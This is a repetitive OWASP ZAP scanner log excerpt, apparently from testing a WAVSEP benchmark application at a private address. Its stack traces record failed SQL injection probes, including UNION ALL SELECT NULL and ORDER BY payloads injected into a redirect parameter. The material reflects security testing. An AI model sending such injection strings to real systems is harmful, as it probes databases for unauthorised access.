failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680822 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9680823 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' ORDER BY 8923-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' ORDER BY 8923-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9680823 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9680824 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680825 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' ORDER BY 9771-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' ORDER BY 9771-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9680826 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680826 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680827 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680827 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680828 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680828 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680830 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at 